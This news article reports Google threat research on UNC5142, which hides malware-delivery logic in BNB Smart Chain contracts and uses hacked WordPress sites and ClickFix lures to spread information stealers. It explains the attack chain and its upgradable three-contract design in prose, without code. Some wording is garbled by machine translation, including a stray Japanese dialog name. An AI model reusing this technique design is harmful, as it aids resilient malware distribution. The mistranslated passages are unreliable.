A financially motivated attacker, codenamed UNC5142, has been observed exploiting blockchain smart contracts as a way to facilitate the distribution of information stealers such as Atomic (AMOS), Lumma, Rhadamanthys (aka RADTHIEF), and Vidar, targeting both Windows and Apple macOS systems.
“UNC5142 is characterized by the use of ‘EtherHiding,’ a technique used to place and hide compromised WordPress websites and malicious code and data on public blockchains, such as the BNB Smart Chain,” Google Threat Intelligence Group (GTIG) said in a report shared with The Hacker News.
Google announced that as of June 2025, it had flagged approximately 14,000 webpages containing injected JavaScript that exhibited behavior related to UNC5142 and was indiscriminately targeting vulnerable WordPress sites. However, the tech giant noted that it has not seen any UNC5142 activity since July 23, 2025 that would suggest a suspension or shift in operations.
EtherHiding was first documented by Guardio Labs in October 2023, detailing an attack that leverages Binance Smart Chain (BSC) contracts to serve malicious code via infected sites that provide fake browser update alerts.
A key aspect behind the attack chain is a multi-stage JavaScript downloader called CLEARSHORT that enables malware distribution via hacked sites. The first stage is JavaScript malware that is injected into a website to obtain the second stage by interacting with a malicious smart contract stored on the BNB Smart Chain (BSC) blockchain. The first stage malware is added to plugin-related files, theme files, and sometimes directly to the WordPress database.
The smart contract is responsible for retrieving the CLEARSHORT landing page from an external server. This server employs ClickFix social engineering tactics to trick victims into installing Windows[ファイル名を指定して実行]It runs malicious commands in a dialog (or the Terminal app on Mac) and ultimately infects the system with stealer malware. Landing pages are typically hosted on Cloudflare .dev pages and are retrieved in encrypted form as of December 2024.
CLEARSHORT infection chain
On Windows systems, the malicious command involves executing an HTML application (HTA) file downloaded from a MediaFire URL, then drops a PowerShell script to evade defenses, fetch the final encrypted payload from GitHub or MediaFire, or possibly your own infrastructure, and run the stealer directly in memory without writing artifacts to disk.
In attacks targeting macOS in February and April 2025, attackers used ClickFix decoys to prompt users to run bash commands on a terminal that retrieved shell scripts. The script then uses the curl command to retrieve the Atomic Stealer payload from the remote server.
Distribution of UNC5142 final payload over time
CLEARSHORT is assessed to be a variant of ClearFake, which was the subject of extensive analysis by French cybersecurity firm Sekoia in March 2025. ClearFake is a rogue JavaScript framework that is deployed on compromised websites and distributes malware through drive-by download techniques. It is known to have been active since July 2023, with attacks employing ClickFix around May 2024.
Blockchain exploitation has several benefits, as this sophisticated technology not only blends with legitimate Web3 activity, but also makes UNC5142 operations more resilient to detection and removal efforts.
Google said the attackers’ campaigns have undergone significant evolution over the past year, moving from a single contract system to a more sophisticated three-smart contract system starting in November 2024 to increase operational agility, and further improvements were observed in early January of this year.
“This new architecture is an adaptation of a legitimate software design principle known as the proxy pattern, which developers use to make contracts upgradable,” the company explained.
“This setup acts as a highly efficient router-logic-storage architecture, where each contract has a specific job. This design allows critical parts of the attack, such as landing page URLs and decryption keys, to be quickly updated without requiring any changes to the compromised website’s JavaScript. As a result, campaigns become more agile and more resistant to takedowns.”
UNC5142 accomplishes this by leveraging the mutable nature of smart contract data (note that program code cannot be changed once it is deployed) to change the payload URL, and incurs a network fee of $0.25 to $1.50 to perform these updates.
Further analysis revealed that the attackers were using two different sets of smart contract infrastructure to deliver the stealer malware via the CLEARSHORT downloader. The main infrastructure is said to have been created on November 24, 2024, while the parallel secondary infrastructure was funded on February 18, 2025.
“Main Infrastructure stands out as the core campaign infrastructure, characterized by early creation and a steady stream of updates,” GTIG said. “Secondary infrastructure looks like a parallel, more tactical deployment; it could be established to support specific spikes in campaign activity, test new temptations, or simply build operational resilience.”
“Given the consistent operational tempo over the past year and a half, the large number of compromised websites, and the diversity of distributed malware payloads, as well as frequent updates to the infection chain, we believe UNC5142 has achieved some operational success.”
Source link
